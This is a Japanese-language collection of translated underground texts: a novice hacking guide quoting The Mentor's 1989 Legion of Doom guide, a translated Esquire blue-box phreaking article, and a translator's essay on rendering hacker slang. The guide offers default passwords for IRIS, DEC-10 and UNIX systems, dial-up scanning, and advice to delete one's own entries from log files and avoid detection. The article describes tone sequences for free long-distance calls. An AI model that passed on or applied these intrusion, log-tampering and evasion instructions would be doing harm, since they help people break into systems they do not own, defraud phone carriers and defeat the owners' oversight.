SucannerとはUSERが指定した番号にダイアルし、他のモデムから帰 ってくるトーンを調べるプログラムである。(これで近所のターゲ ットを指定出来る)私が薦めるSCANNERはTonelocだ。見つけてみよ う。きっとこのソフトの使い方は知っているだろう・・・。そして さらにこれを持っていればコンピューター言語の勉強にも役立つ。 (例:C, C++ etc.) 情報収集: 私もそんなに勉強になるようなBOARDを知らない。最近じゃSYSOP(System Operators) がこれらのBOARDを潰しているからである。しかしWWW(World Wide Web)なら アクセスが無制限なので、そこで紹介されているを行ってみる事を薦める。さら にインターネット上で紹介されている検索エンジン等でHomePageを探すのも大事 である。(http://webcrawler.com) Silicon Toads Hacking Resources Flamestrike Enterprises The Plowsk・ Page (私のHPである。ここで私とコンタクト可能) Matervas Hideout Burns Lair Cold fire これらの名前を検索してみれば、きっと役立つH/P情報を入手することが出来る だろう。 始めに: 先ず最初に行う事として、コンピューターを入手する必要がある。そしてTerminal Softwareを開き、Boardに接続する。(Bulletin Board System, BBS)これは絶対 必要である!(そして基本中の基本でもある。BBSの電話番号は巷のHPや検索エ ンジン等で見つけられる)そして次に行う事として、そこのBBSに載っているド キュメントを可能な限り読むのである。出来る限り沢山のファイルを読むのだ。 必須読書: Hackers Manifesto (at bottom) Hackers Code of ethics Any old issues of Phrack any old issues of 2600 2600faq すべてのSystemに関する物 (UNIX, IRIS, dec) DOD (Department Of Defense) Standards 全てのBoxes関連物 (Blue, Red, Beige) これを読んでいる初心者の為に、先ず下記で紹介するシステムを探す事を薦める。 (これからは簡単だし、危険も少ない)次に紹介するメッセージはLegion of Doom/Legion of Hackersからの引用である。 A Novice's Guide to Hacking- 1989 edition by The Mentor Legion of Doom/Legion of Hackers IRIS- IRISとはInteractive Real Time Information Systemの略である。基 本的にはPDP-11上で稼動するのであるが、最近では殆どのシステムで 起動可能となっている。それがIRISか否かは、“Welcome to "IRIS" R9.1.4 Timesharing”と“ACCOUNT ID? prompt”みたいなバーナーを 見れば分かる。IRISは無期限でHACKINGさせてくれるし、さらにLOGも 残らないのである。私はDefault Passwordを知らないが、下記の共通 で使われるPasswordをトライしてみよう。 Common Accounts: MANAGER BOSS SOFTWARE DEMO PDP8 PDP11 ACCOUNTING DEC-10- DEC computerの初期バージョンで、TOPS-10 Operating Systemで起動 する。これらのマシンは“.”というPromptで見分けることが出来る。DEC-10/20 シリーズはHACKER連中に対して大変フレンドリーな物であり、シス テムにLOGINしなくても大体の重要なコマンドを指定することが出来 るのである。アカウントは[xxx,yyy]というフォーマットで、xxxとyyy は整数で成り立っている。LOGINしなくても、Process NameとAccount のリストは“.systat” (SYstem STATus)コマンドを行えば見る事が 出来る。この時もし画面に[234,1001] BOB JONESみたいな文字が 表示されたら、BOBかJONESか、それかBOBとJONES両方がパスワード の可能性が高い。LOGINする際は.login xxx,yyyのように入力し、パ スワードPROMPTの時にパスワードを入力するのである。そして怪しい LOGINの記録をキープすることはないのである。そして入力したUIC(UIC = User Identification Code, 下記1,2参照) が間違っていたら、そのつど 画面に表示してくれる。 Common Accounts/Defaults: 1,2: SYSLIB or OPERATOR or MANAGER 2,7: MAINTAIN 5,30: GAMES UNIX- 現状においてUNIXを起動させているマシンが沢山ある。一部ではこ れを最高のOperating Systemでないと、批判的な意見も上がってい るが、世界中で最も多く使われていることは事実である。UNIXは普 通、小文字で“login:”というPROMPTから始まる。さらにUNIXでは 無制限でのLOGINが行え(大抵のケース)LOGなどはキープしないの である。 Common Accounts/Defaults: (注意点として、一部のケースではシ ステムが非常に敏感なので小文字を使う事を覚えておくこと。それと 多くの場合、パスワードが設定されていないのである) root: root admin: admin sysadmin: sysadmin or admin unix: unix uucp: uucp rje: rje guest: guest demo: demo daemon: daemon sysbin: sysbin Code of ethics: 一度システム内に侵入したら、LogFile以外は変えないこと。(自分の失敗した Loginを消す)そして絶対に自分のハンドルをシステム内に残さないこと。何故 なら相手はハンドルだけで犯人を追跡することもあるからである。被害妄想に浸 るだけにとどめることである。一瞬でも自分は相手にバレないなんて思わないこ と。もし一度でも何か失敗したら、それで捕まることも考えられる。ではここで トラブルから逃れられるかもしれない、アナタが出来ることをリスト形式で紹介 する。 * 自分のHARD DRIVEをEncrypt化する。 * ファイルを一番安全な場所に保管する。 * 他人に自分がHACKINGに関して詳しいなどという趣旨の言葉を言わないこと。 良いHACKERは絶対に自分が現在取り組んでいる内容について他人には言わな い。彼らは漠然としたヒント以外人には教えないのである。 * 自分の名前や住所を一般に公開しないこと。 * 大組織なHacking Groupに入らないこと。個人で活動すること。 * 政府機関のコンピューターはHACKしないこと。特に自分の国の政府機関であ る!!外国のコンピューターは時として楽しい内容を含んでいることがある。 しかし実行して捕まったら、私が忠告しなかったなどと文句を言わないように。 * 自分の形跡が残っていないか、よく確認すること。そして自分が誰なのかも 分かるような証拠も残さないこと。 * 頭を使え。 ここで紹介されているガイドラインに添って行えば、大抵は安全だろう。失敗し たら、最後にアナタがする事とは、何処かの州刑務所の3階に位置する狭いブタ 箱でブルーノという無期懲役の斧殺人犯と一緒に過ごすことだ。 作業開始: Hackingを行う際に一番難しい事とは、そのシステムの電話番号を入手すること だろう。これはScanning Programで調べることが出来る。そして一度システムに 接続出来たら、先ず最初に自分がどういうシステムに接続しているかを理解する ことが大事である。(ところでこれを読んでいる頭の固い連中へ。他のシステム に接続するにはTerminal Softwareを使用しなければいけないのである)これは システムが表示するPromptを見れば大抵は分かることである。時にはUserが接続 した時点ですぐそのシステムがどういうのかを表示することもある。下記がその 例である。 "hello, welcome to Anycompany using anysystem v 1.0" 自分が接続してるシステムがどういうのか分かったら、早速HACKに取り掛かる。 先ずはUser IDをdemoとして他の使えそうなUser Nameを見つける。もし名前を 入力した時点でシステム内に侵入出来たら、それを使用して他のUser IDを探し 出す。この方法はひょっとしたら既にご存知かもしれないが。 システム内では: システム内に無事侵入出来たら分かるが、内部には非常に沢山の面白そうなファ イルが存在する。そのシステムに関するファイルも読むことが出来る。そしてHELP コマンドを使用するのである。このコマンドを使用すれば大抵の必要な事を知る ことが出来る。そして運がよければ、システムのマニュアルまでダウンロードす ることも出来る。 HACKする時のスリルに匹敵するような物はない。それが仮にうまくいかなくても、 実行最中は非常に楽しいものである。しかし巷に公開されている沢山のテキスト ファイルを読んでも、一番始めのHACKと比べて理解出来ないことだってある。ま あ楽しんでもらいたい。 ではここで再度上記と同じテキストファイルから引用した文章を載せる。 A Novice's Guide to Hacking- 1989 edition by The Mentor Legion of Doom/Legion of Hackers Unresponsive Systems ~~~~~~~~~~~~~~~~~~~~ 時々接続しても何の反応を見せないシステムに出くわす事がある。これは実に頭 にくることであるが、しっかりとした理論的アプローチを時間をかけて試みてみ れば、相手はちゃんと反応してくれるものである。下記のリスト内容はそういっ た相手に対して“何か”を行わせるものである。 1)PARITY、DATE LENGHTH、STOP BITS等を変える。これをすれば8N1で何の反応 を示さなくても7E1とか8E2とか7S2で反応することもある。もしdata length が7か8、そしてSTOP BITS1か2で、EVEN, ODD, SPACE, MARK, そしてNONE といったTerm Programが無いのであれば、何処かで買ってくることである。 別に高級なTerm Programを持つ必要は無いが、あれば絶対に重宝する。 2)baud ratesを変える。再度、持っているTerm Programが600や1100と いった数字を指定出来るなら、時にはシステム内に侵入することが出来る。 3)Send a series of 's. 4)Send a hard break followed by a . 5)ピリオドを入力する。Canadian network Datapacはこれに反応する。 6)もし何かゴミが表示されたら、“i”を入力する。TymnetやMultiLink IIには これに反応する。 7)^Aから^Zのコントロールキャラクターを一つずつ試してみる。 8)terminal emulationを変える。アナタのvt100 emulationは、ゴミADM-5 emulation を使用すればはたちまち消え失せると思っている。ここらへんもアナタの使 用しているTerm Programによる。 9)LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO, JOIN, HELP、そしてその他自分が思い付く単語を入力してみる。 10)もしそれがDail Inなのであれば、そこらへんの番号を試してみて相手の 会社(プロバイダー etc.)が、どう反応するか調べてみる。もし反応する なら、そこでちょっとしたsocial engineering的内容を行ってみる。 私はこのテキストファイルの内容を出来る限り少なくすることによってダウンロ ードの時間を少しで短くし、その上何を行うべきか、何を読むべきかといった、 基本的重要な事を教えたつもりである。これが少しでもアナタのHELPになることを 願う。 Plowsk・ Phreak ではここで、他のファイルから引用した2つのテキストを紹介しよう。 Blue Box.txt and The Hackers Manifesto Blue Box.txt - Little Blue Boxの秘密はEsquire Magazineで明らかになった “ついにBLUE BOXが紹介された:それは実に完成度の高い物であった” 私は今、大変高貴に満ちたAl Gilbertson氏自宅のリビングルームに居る。 Al Gilbertson氏はその名と知れたBlue Boxの製作者である。Gilbertson氏の片 手には、Blue Boxが黒色と銀色を眩しく輝かせ、13個の赤いボタンがconsole から飛び出している。彼は自分の指を、まるでダンスをしているかのように動か し、耳障りな音を発する電気製品のボタンを押している。 彼は私に、このBlue BoxがHe is trying to explain to me how his little blue box does nothing less than place the entire telephone system of the world, satellites, cables and all, at the service of the blue-box operator, free of charge.“これはそういう事をする物です。これは基本的にスーパーオペレー ター的な力を与えてくれます。You sieze a tandem with this top button” 彼が人差し指で一番上のボタンを押すと、そのBlue Boxはハイピッチな効果音を 発した。「こんな感じに。」彼がそう言うと、再度Blue Boxが鳴った。「これで 電話会社の長距離通話スイッチィングシステムを自宅にある可愛らしい電話機や、 どんな古い電話機からでも好き放題にコントロール出来ますよ。そしてさらにこれ は匿名性もあるのです。オペレーターは明確な場所からオペレートしなければい けません。電話会社は相手が何処から電話を掛けているか、相手が何をしている か等は把握しています。しかしこのBlue Boxを使えば、例えばHoliday Inn(翻 中:大手ホテル会社) の800番を使用しても、相手は私が何処から電話を掛 けているか、何をしているか分からないのです。当然私がどうやってこの電話回 線に侵入して、800番を利用したのかも分からないでしょう。さらに相手には こちらが犯罪的行為を行っているという事さえも知られる事はないのです。これ で自分の元となる情報を何処までも隠す事が可能となったのです。例えば隣の家 に電話を掛ける際、一度White Plainsを通して、そしてケーブルを通してLiverpool に接続し、そして人工衛星を通して自分の所に戻すことも可能です。さらにこれ を使えば、世界中にある公衆電話から自分の隣にある公衆電話に電話を掛ける事 も可能ですし、さらにお金も戻ってくるのです。」「それで相手も犯人を見つけ られないと言うのですか?お金もかからないのですか?」私は聞いた。「その通 り。でもそれはちゃんと説明通り使えばの話しです。でも実際に行ったら分かる と思いますが、タダ掛けというのは、初めて自分の子供を腕に抱えた時に感じる 力の様にエキサイティングな物じゃないですよ。私自身、幾度も色々な人達がこ のBlue Boxを使っている所を見た事があります。そして彼等は本当にそれが使え る事を知り、十字架やジグザグしたスイッチを押し続けるのです。そしてやっと 人と会話することが出来、相手にその事を報告します。彼等は最初に“こんにち はとでも言って次にどんな電話を掛けるか考えるのです。彼等はちょっとクレ イジーな事を考え出しはじめるのですよ。」Gilbertson氏は下を向き、ヒザを眺 めるような格好で話し始めた。彼の指は未だにダンスをしているかの様にビーパー のパターンを押し続けている。「これは私の作ったモデルがいかにちっぽけな物 であるかということでしょう。巷には沢山ものBlue Boxが存在します。しかし私 の物はその中でも非常にちっぽけな電気道具にすぎないのです。本来なら我々の シンジケートから頼まれた携帯用のBlue Boxをお見せしたかったのですが・・・・。」 彼はさらに続けた。「我々はラスベガスに住んでる、シンジケートの幹部クラス の男から1000個もの依頼を受けました。They use them to place bets coast to coast, keep lines open for hours, all of which can get expensive if you have to pay。商談の方は、一個につき300ドル、それまで我々は一つ1、50 0ドルでさばいてきました。はっきり言えば合計で300、000ドルという収 入はかなりキツイものがあります。とりあえず我々はフィリピンに制作工場があ ったので全ては準備万端でした。とにかく私がかなり制限して制作した商品はflip-top Marlboro Boxの中に入るには充分でした。私はキーボードの為に、見にくく飛び 出しているボタンを使用せず、flush-touch panelを代わりに付けておきました。 まぁ携帯用のラジオを想像していただいても結構です。実を言うと、私はこの 製品を制作する時、AMチャンネルが受信出来る小さなトランジスタを元にしたん です。そうすれば法律が厳しくなって、何かが起きても所持者はラジオのパーツ をすぐに変えれば、相手もまさか犯罪行為が行われているなど分からなでしょう。 私は今回のモデルの為に全てを考えました。小さなトランスミットにあるベルト から発するラジオシグナルで引火することもあるテルミットのバンドで施した配 線を設け、仮に本体がバーストを起こしても瞬時に灰に変わるように考慮したん です。それは美しい。非常に美しい小さなマシンですよ。アナタも彼等シンジケ ート連中が戻ってきたら一度は顔を見るべきですよ。最初に彼等が私の製品を 見た時、まるで二度と離したくないように固く手に握ってこう言ってましたよ。 “信じられない”って。アナタも多分これを使用するまえ信じられないでしょう ね。」 “BLUE BOXの実験:接続に成功” 二日後の夜11時頃、Fraser Lucey氏は左手にBlue Boxを持ち、右手には電話を 握っていた。その時彼は、潰れて寂れながら放置されていたホテルの隣にある電話ボ ックスに立っていった。そして私は電話ボックスの外で待っていた。Fraserは どうやら人に見せるのが好きらしい。つい数週間前にPacific Telephoneの通報 により数人の連中が逮捕されるまで、LuceyはよくパーティーなどでBlue Boxを見せびらかしていた。それは非常にうまかくいった。彼のちょっとしたBlue Boxに関する知識だけで、彼は集まりの注目の的となれたのである。電話線を使用した トリックを大衆に見せ、注文を受けた番号に何時間も電話を掛けまくったのであ る。彼はその内メキシコにある彼が所持している工場から発注を受けるようにな った。つまりディーラーになったのである。Fraserは現在人に見せる時は注意 深くなっている。しかしBlue Boxを使う事に疲れを感じない。「毎回使用する時 が最初の時みたいなんだ。」彼は曰く。彼は10セントをスロットに入れた。受 話器を耳に抑えながら電話ボックスから発するトーンを聞きていた。私も隣でそ の音を聞いていた。「私は今800番号をかけているんだ。どんな800番号で も可能なんだよ。トールフリーだし。じゃあ今夜はRyder Rent A Vanの番号を使 ってみよう。よくベルの音を聞いてごらん。じゃあいくよ。ほらっ!」そう言う と彼はBlue Boxを受話器の喋る方に押さえつけた。ちょうど銀色のスイッチと、 12個の黒い色したボタンが私の方に向いているようになる。先ず彼は銀色のボ タンを押した。するとハイピッチな音が鳴った。「その音が正確に一秒間に2、60 0サイクルなんだよ。」Fraserは言った。「ほらっ、早く、聞いてごらん。」 彼は私に受話器の耳当ての部分を押さえつけ。その時ベルの音は消えていた。電 話線が多少なる高音の雑音を発している。その後何やら鋭いバズ音が聞こえると、 突然音は消えて、最後には緩やかな雑音のみが聞こえるようになった。「これで 俺達は無料だよ。」Luceyはそう言うと、私から電話を奪い再度Blue Boxを受 話器に当てた。"We're up on a tandem, into a long-lines trunk. Once you're up on a tandem, you can send yourself anywhere you want to go."彼は先ず イギリスはロンドンのWaterloo駅にある公衆電話を掛けてみることにした。そこ なら人通りも多いし、電話が突然掛かっても通行人の誰かが受話器を取ってくれ て話してくれる可能性も充分考えられるので、PHREAK連中には有名な場所でもあ った。彼は先ず本体の左角にある“KP”と書かれているボタンを押した。「これ はKey Pulseの意味だよ。これで相手に我々は準備万端だよって事を知らせるんだ。 じゃ最初に、KP 182 STARTを押してみよう。which will slide us into the overseas sender in White Plains.。」その瞬間何やら音が聞こえ出した。「多分我々は 人工衛星を通ってイギリスに行っているハズだよ。本当はケーブルの方が速いし、 コネクションも他よりも良いんだけどね。でも個人的には衛星を使った方が好き なんだ。だから私はただKP Zero 44(044)を使用するんだ。ここでのZEROは、衛星への 接続を約束し、44はイギリスの国番号なんだ。おっ、オッケー。どうやら成功し たようだ。じゃあ後はロンドンの市外電話番号である1を押すだけさ。そして 公衆電話をダイアルアップする・・・・ほらっ、聞いてごらん。ベル音が聞こえ るから。」その時受話器からはロンドンからのプルル、プルルという優しい音が聞こえた。 すると誰かが電話を取ったのである。「もしもし」ロンドンからの声である。 「もしもし、これは誰ですか?」Fraser氏が言った。「もしもし、これは誰でも ないんですが、私はただここを通っていた瞬間に受話器が鳴っていたので電話に 出ただけですよ。これは公衆電話ですから。普通なら誰も電話に出ないんですよ。」 「ちょっと!!まだ電話切らないでよ。私はアメリカから電話を掛けているんで す。」「え?どういった目的でここへ電話を?これは公衆電話ですよ。」「あ、 そのまぁ・・・ちょっとロンドンがどんな感じか知りたくてね。で、どう?最近 のそっちは。」「今は早朝5時で、朝から雨ですよ。」「そっか、で。君は誰な んだい?」The London passerby turns out to be an R.A.F. enlistee on his way back to the base in Lincolnshire, with a terrible hangover after a thirty-six hour pass.Fraser氏と、この男性は雨の事に関して喋っている。そして2人は雨が降 らない方が良いという事で合意した。そして二人は“Good-Bye”を言うと電話を 切った。すると最初に入れたFraserの10セントが綺麗な音を立てながら電話機 から落ちてきたのである。「今のは遠かっただろ?」彼はうなずきながら言った。 「ロンドン、まぁこんなもんさ。」彼は優しくそのBlue Boxを握っている。「俺は これが本物だって言ったよね。聞いてごらん。もし君が良いならこれからパリに 住んでいる女の子に電話を掛けようと思うんだけど。普段ならこの時間帯に彼女 に電話を掛けるんだけどね。彼女は驚くぜ。じゃあ今回はPenskeの800番と海外ケ ーブル133を使ってみよう。33とはフランスの国番号で、1番でケーブル接続する んだ。じゃあいくよ・・・・あっ、クソ・・・ビジー状態じゃないか。こんな 時間、誰が彼女と話しているんだ?」その時警察の車が我々の居るホテルの道を 通り過ぎていった。車は停まらなかったが、どうもFraserが気になり始めた。 我々はすぐ彼の車に戻り、さっきの警察の車の反対方向へと10マイルほど走り出 した。そしてガソリンスタンドのTEXACOの近くで電話ボックスを見つけ、急ブレ ーキを掛けながら車を停め、Fraserは電話ボックスへと駆け出し、再度パリへと 電話を掛けた。しかし電話線はまだビジー状態なのである。「一体誰が彼女と話 しているんだ??きっとサーキットがビジー状態なんだ。まいったなぁ・・・俺 はこういう状況でどう対処するべきかまで勉強していないんだ・・・・」Fraser はその後もタダ掛けをやりまくった。彼はネーションワイドで課金される800番 を多用し、オーストラリアはシドニーの時報に電話をしたり、ローマの天気予報 にも電話を掛けたりした。勿論イタリア語であるが。さらにシカゴの友人宅にも 電話し、He calls a friend in Chicago and talks about a certain over the counter stock they are into heavily.しかし相変らずパリの女の子の自宅には、 ビジー状態が続いた。彼は違うディーラーの人物に連絡しtalks in code. そしてJoe Engressiaという、天才的PHREAKの仙窟者に連絡を取り、彼に誠意を示 した。どうやら他の方法があるらしい。そして数日後、ついに彼はパリ に居る彼女の自宅に電話を掛ける事に成功した。二人はサーキットがビジーだっ たという事で合意し、パリの電話システムを非難し始めた。Fraserは夜中2:30に 彼女との電話を切り、落ちてきた10セントを握りしめると、彼が“愛らしいBlue Box”と呼んでいる物を片手に抱えながらもう片方の手で車のハンドルを握り、夜中 の道を飛ばしていた。 “長距離電話は自分が思っているほど話せない” 「数年前、電話会社は大きな間違いを起こしたんだ。」二日後Gilbertson氏が自 宅のアパートで説明してくれた。「彼等は他の技術系の雑誌の、幾つもの異なる 音色の制作に関する詳細の公開に対して、ほとんど気にしてもいなかったんだ。 Bell電話研究室(Bell Telephone Laboratories)のエンジニアが言っているス イッチの理論的な記事と、トーンのパッシングのリストを記事に載せたんだよ。 私は当時エンジニアの図書館でこういった内容の記事を手にする前までMIT(マ サチューセッツ工科大学)で色々と電話回線を数年間、いじくり回していたんだ。 だからこの記事を入手してから、私は実験室に駆け込んで、最初に記事を見てか らだいたい12時間後には初めてのBlue Boxの自主制作に成功したんだ。最初の そのBlue Boxはこれよりも大きくて作りも雑だったが、実験は成功はしたんだ。」 主にBellの実験室で、他のエンジニアの為に書かれた実験内容等は、いまでは技 術関連誌の記事となって公共に公開されてしまっているのである。それか少なくても 一般公開されてしまった。「技術学校の図書館にでも行ってその記事をコピーで もして試してごらん。Bell has had them all red-tagged and withdrawn from circulation Gilbertson氏は教えてくれた。「でも実はもう遅いんだよね。既に世間に公開 されしまったわけだし。一度公共化されたら、その技術に必要なディバイスは 12才の子供にだって作れるくらいになってしまう。眼の見えない12才にだって 作れちゃうんだ。ひょっとしたら私が12時間でかかったのを、それ以内で行え るかもしれない。さらに私が作った物より、この私のポケベルくらいコンパクト で、さらに私が作った物と同じ機能が使用出来るようなものをだ。」「そこまで 出来ますかね?」私は聞いた。「およそ20年前、AT&Tは巨額の資金を投資して 今までの長距離電話回線のスイッチングシステムを、6つのトーンと12の組み 合わせで操作出来るシステム開発を行なったんだ。これらトーンは、今でも長距 離電話を掛ける時に、電話口の後ろで聞こえる音のことだよ。そして彼等はその トーンを、簡単な音色を使用することに決めてしまったんだ。それぞれのトーン は、6個の音色の内、2つのトーンを同時に出し、特定のビートを作り出す仕組 みなんだ。例えば1300サイクルと900サイクルの音色を同時に発して、電話 のプッシュ音の5の音色を作り出すみたいにね。ここで一部のPhreak連中が行なった こととは、まず電話オルガンを持ちだしてきたんだ。ほら、よくそこらへんの 自宅に置いてあるような安っぽいオルガンだよ。もともとさっきも言ったように プッシュ音の周波数は公共に公開されてしまったので、ある盲者なんて、それを 盲目の人がよく使うtalking bookに録音しちゃったりもしたんだよ。彼等はただ トーンと同じ音階をオルガンで探せばいいだけだったから。そしてそれをテープ にでも録音して終わり。例えばMa Bellの電話番号のトーンだったら、まず最初 にオルガンのF3とA3(毎秒900サイクルと700サイクル)を同時に押す んです。プッシュ音の2なら、F3とC6(毎秒1100サイクルと700サイ クル)こうやって全てのプッシュ音を調べだしてそれを表にし、二度と間違えな いようにしたのです。」彼はそう言うと私に番号のリストと、それぞれのトーン の音色のリストが書いてある紙を渡してくれた。さらに彼は続けた。「本当は これらのオルガンの音を毎秒3 3/4インチの回転スピードと、それを2倍した7 1/2 インチでプレイするレコーダーで録音しないと、正確ばトーンを録音する事は出 来ないんです。」「じゃあ一度全てのトーンを録音したら、どうやってその音を 受話器に流せばいいの?」「それにはまずオルガンとカセットレコーダーが必要 です。そして自分の掛けたい番号のトーンを流します。勿論国番号も含めてです。 そしてルーティングのインストラクションに添って、あとは'KP'ボタンと'Start' を押すだけです。それかもしオルガンがどうしても用意出来ないのであれば、 誰かPhreak仲間からにでも全てのトーンが録音されているテープと、“番号1” と言う人間の声が入ったテープを送ってもらえばいいのです。その2つのテープ を何度も繰り返し流して自分の掛けたい番号のトーンを作ります。この方法なら 世界の何処かにいるどんな間抜けでも、間違いなく掛けたい番号にいくらでも電 話を掛けることが可能なのです。」「と、言うことは、カセットレコーダーを受 話器にあてて、掛けたい番号のトーンを鳴らせば、相手の機械はそれが自社の トーンだと勘違いすると言うのですか?」「その通りです。電話会社の毎秒30 サイクルトーンを鳴らしている限り、相手の機械はそれが自社の機械が自分にた いして鳴らしている音だと勘違いするのです。Phreakの元祖で完璧なピッチを 鳴らすJoe Engressiaという盲目の少年がいるのですが、彼はなんと電話相手に 笛を使っているそうです。さすがに電話のオペレーターなら機械のトーンと笛の 音色の判断くらいつきますが、これが機械相手だと判断出来ないのです。電話会 社が規模を大きくし、人間の手に頼らず機械を導入するほど、我々Phreak連中に とって作業がやりやすくなるのです。」 (第二部に続く) 888888888888888888888888888888888888888 /////////////翻訳作業アレコレ////////// 888888888888888888888888888888888888888 Written By plutur plutur@hotmail.com ICQ:not installed yet... IRC: sorry, i don't do that kinda stuph... 初めに UNIXやWindowsのハッキングテキストはネットで出回っていますが、同じUGでもUGテキストの翻 訳について書かれた日本語テキストは無いでしょう。(自分が知っている限り)私も随分といろ いろなテキストを日本語翻訳してきましたが、今回は今までの経験で私が思った事や感じた事な どを皆さんにご説明したいと思います。 翻訳作業までに 今まで色々な人達が時間を掛けて地下系の英語テキストの翻訳作業を行なってきましたね。皆 さんも日々、そういう数少ない日本語テキストを見て勉強していることでしょう。勿論私もそ の中の一人でありますが、今でも1つどうしても分からない事があります。何故初心者(Newbie) 様の日本語テキストが無いのであろうかという事です。某HPでは「初めてのクラック講座」 みたいなテキストが公開されていますが、残念な事にこれはメンバーのみであり、実物を見た こと無い私にとって、これは私にとって非常に興味深々な物です。(しかもそのHP閉鎖しち ゃったしね・・・・・・-_-;) 私は今でも初心者の域から脱出出来ません(苦笑)他の初心者が知りたがっている事は、私の 知りたい事でもあります。ですが幸いにも私は英語を多少なり理解する事が出来ます。結構皆 さんは店頭やWarezで入手した翻訳ソフトを使って長文テキストを翻訳していますが、私はそん な事しなくても大抵の文章は理解出来るので、そこら辺、非常にラッキーだと思っていますし、 そういう意味では私は他の初心者より情報収集が早いと思っています。(それを覚えるか否か は別問題ね) しかし私も人間ですし本音を言えば、私に変わって誰かに翻訳作業をやってもらい、その結果 だけ私に見せてもらいたいです。(笑)だがそんな人がいるでしょうか。英語が出来て、日本 語が出来て、私の為に長文テキストを翻訳家並の文法で訳してくれる人・・・・いたら是非紹 介して頂きたいです。(笑)私の英語力も翻訳文を御覧頂ければ理解すると思いますが人に自 慢する程でもないし、母国語の日本語にしたって怪しい言葉がちらほら見え隠れしている。こ こではっきりしておきますが、私は翻訳家でも無いし語学者でも無い。しがない一日本人です。 これでメシを食っている訳でも無いし、もともと英語を勉強している人でも無いのです。(職 業は秘密ね)コンピューターだって趣味でやっているだけでなのです、だから私の翻訳テキス トで、技術的な間違いがあっても、それで私を批判しないでください。私もそれなりに頑張っ て、出来る限り性格、且つ分かりやすく翻訳をしています。(そうです。言い逃れです。hehehe....) ここで私が言いたい事とは、確かにアンダーグラウンドの世界では、それなりに沢山のコンピ ューターの内容を勉強する必要があります。(Windows 95、Windows NT、UNIX、Network、 Firawall、TCP/IP、等)ですが、それと同じくらい英語の勉強も必要だということです。アン ダーグランドで「オレ、頭悪いからUNIX勉強しないね」なんて言っている人いますか?それと 同じで英語もUNIXと同じくらい必要不可欠なのです。ここらへん、どこまでの人達が認識して いるでしょうか。現状ではまだわずかな人達だけだと思います。私は別に英語の出来ない人を 馬鹿にしているのではありません。ただ、英語が多少なり出来るから、なおさらこうして言う のです。私も完璧に英語が理解出来る訳ではありません。だから少しでも理解出来るように英 語の勉強をしています。その成果あって、ここまで一人でここまで翻訳する事が出来ました。 //\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ \\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\// ここで皆さんが少しでも英語テキストを理解出来るように、幾つかポイントを挙げておきます。 少しでも参考になれば幸いです。 (1)<<<英語版ソフトウエアを前提>>> まず一般テキストの英語テキストは当然ながら英語ソフトウエアを前提をとして書かれています。 例えばWindows 95も、英語版Windows 95を前提として書かれています。これを読んでいる人達の 殆どは私は英語版95に触れた事は無いと思います。私は英語版と日本語版、両方を使用するの で文章を理解すること自体は苦ではありませんが、日本語版のみ使用している人達は、ここで先 ずつまずくかもしれません。ここで1つ英語文章の一部を例として転載してみます。 > 2. Launch regedit--select Start/Run, type regedit in the text box, and press Enter. これは私がWindows 95 CD-Keyで紹介した文章の一部です。翻訳版を見れば分かると思います が、select Start/Runの部分、英語版のWindows 95では「ファイル名を指定して実行する」が 「RUN」なのです。 これと同じ事で「編集」を、英語では「Edit」と言います。これはまだEditという単語を翻訳 すれば理解出来る事でしょうが、さすがに「RUN」から「ファイル名を指定して実行する」は、 翻訳とかの問題では無いですね。しかし「RUN」→「ファイル名を指定して実行する」は希な 例で、「Edit」→「編集」のように、英語でも書かれても訳せば意味が通じる事が大抵です。 私の翻訳も、手元に日本語Windows 95が無い場合は英語のコマンド名でそのまま翻訳テキスト に掲載しています。もしそういう所を見かけたら自分で訳してみてください。 (2)<<<スペリングを数字に当てはめる>>> これは皆さんもご存知でしょう。1がiそれかI、3はEもしくはe、4がAか@・・・・こんな感じ で、スペルを数字に当てはめてしまうのです。私が翻訳をしてて一番目にした単語、それが 3111t3、3l1t3、313373といった文字です。これはELITE(エリート)という単語を数字に当て はめた文字です。他にもH@CKやW@r3zといった文字もちらほら見かけます。これはについては、 こういう文字に慣れるしかないでしょう。あとこれと似た例でWindowsをWindozと言ったりphone fonと言ったりcoolをcewlと言ったりします。これは同じ発音で意図的にスペルを変えた単語 です。ここらへんにも注意しましょう。 (3)<<<有名な物を例に挙げて説明>>> ここでGuide To (moslty)Harmless Hacking 2.2から1つ例を上げます。 >Now suppose you like to surf the Web but your Win 95 box is set up so some >sort of net nanny program restricts access to places you would really like >to visit. Does this mean you are doomed to live in a Brady Family world? No way. ここでBrady Familyという文章がある、これは1980年後半にアメリカで放送されてた有名 なコメディー番組の名前なのです。このように彼等からすればユーモラス(?)な比喩を使用 する事が何度かありますが、こういう場合は無視してもいいでしょう。 (4)<<<無理矢理な翻訳>>> 多くの人達の翻訳を見てきて思った事に、英語テキストを無理矢理に翻訳しているといのが あります。文章翻訳で一番大事なのは、相手がどれだけ理解出来るかという事であり、自分 の語学力を見せつけるのではないのです。勿論正確に翻訳する事も大事です。が、正確に翻 訳しすぎて、その結果相手が理解出来なかったら、今までの苦労はなんなのでしょうか。翻 訳ソフトが良い例です。あれは所詮機械翻訳です。人間の言葉をそのままプログラムしてい るだけで、意志で翻訳しているのではありません。その結果、訳の分からない文章が生み出 されてしまうのです。私の翻訳文章もそれなりに強引な日本語があります。ですけど出来る 限り読んでいる皆さんに理解出来るように心掛けています。大事なのは理解する事です。 読む事では無いのです。 (5)<<<固有名詞>>> これは日本人にはちょっと馴染みの薄い部分でしょう。例えばコンピューターをHe(彼)と言っ たりソフトウエアをshe(彼女)と言ったりする事がテキストでは頻繁に見られます。 My computer got fucked up last night. I think he got computer virus さて、これを翻訳ソフトで翻訳してみましょう。どういう結果が出るでしょうか?翻訳ソフト が無い人でもなんとなく想像出来ると思います。(fucked upは「ぶっ壊れた」・「メチャクチ ャになった」という意味)こういう時は素直に「彼」と訳さず「それ」と訳しましょう。上の 文章は何処かのテキストから転載したのではなく私が適当に作った文章ですが、こういう文章 が実際に何処かのテキストに載っていたら、私なら「オレのコンピューターが昨晩ぶっ壊れた ぜ。多分ウイルスを喰らったんだと思う」と訳します。ではどこに「それ」というセリフがあ るかって?頭の中でそう訳して、それを文章にする時は分かりやすい文章に直すのです。今手 元に翻訳ソフトが無いのでここで例を紹介出来ませんが、きっと機械翻訳だと「私のコンピュ ーターは昨夜、性行を得ました。私が思うに彼はコンピューターウイルスを得たのでしょう」 